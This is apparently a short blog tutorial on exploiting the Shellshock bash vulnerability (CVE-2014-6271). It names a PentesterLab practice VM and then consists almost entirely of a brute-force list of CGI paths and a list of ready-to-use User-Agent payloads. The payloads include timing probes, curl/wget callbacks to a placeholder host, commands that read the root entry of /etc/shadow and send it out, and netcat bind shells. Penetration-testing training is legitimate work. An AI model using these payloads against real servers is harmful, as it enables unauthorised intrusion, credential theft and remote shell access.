CVE-2014-6271 Shellshock Exploitation and Remote Shell Tutorial

A quick tutorial on how to exploit Shellshock (CVE-2014-6271) using timing attacks, remote confirmation and gaining shell back to the host. CC: [email protected] https://twitter.com/CrowdShield Download the Pentesterlab Shellshock VM here: https://pentesterlab.com/exercises/cve-2014-6271

Shellshock CGI-BIN Brute Force List:

/
/cgi-bin/bash
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/fire.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/php
/cgi-bin/php4
/cgi-bin/php5
/cgi-bin/php5-cli
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin-sdb/printenv
/cgi-bin/status
/cgi-bin/test-cgi
/cgi-bin/test.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/test.sh
/cgi-bin/tools/tools.pl
/cgi-mod/index.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/php5
/phppath/cgi_wrapper
/phppath/php

Shellshock User-Agent Strings:

() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=4"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://yourdomain/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 3 && curl http://yourdomain/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 6 && curl http://yourdomain/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://yourdomain/shellshock.txt?sleep=9&?vuln=9"
() { :;}; echo vulnerable 10
() { :;}; wget http://yourdomain/shellshock.txt?vuln=11
() { :;}; curl http://yourdomain/shellshock.txt?vuln=12
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://yourdomain/shellshock.txt?vuln=13;curl http://yourdomain/shellshock.txt?vuln=15;\");'
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"

Leave a Reply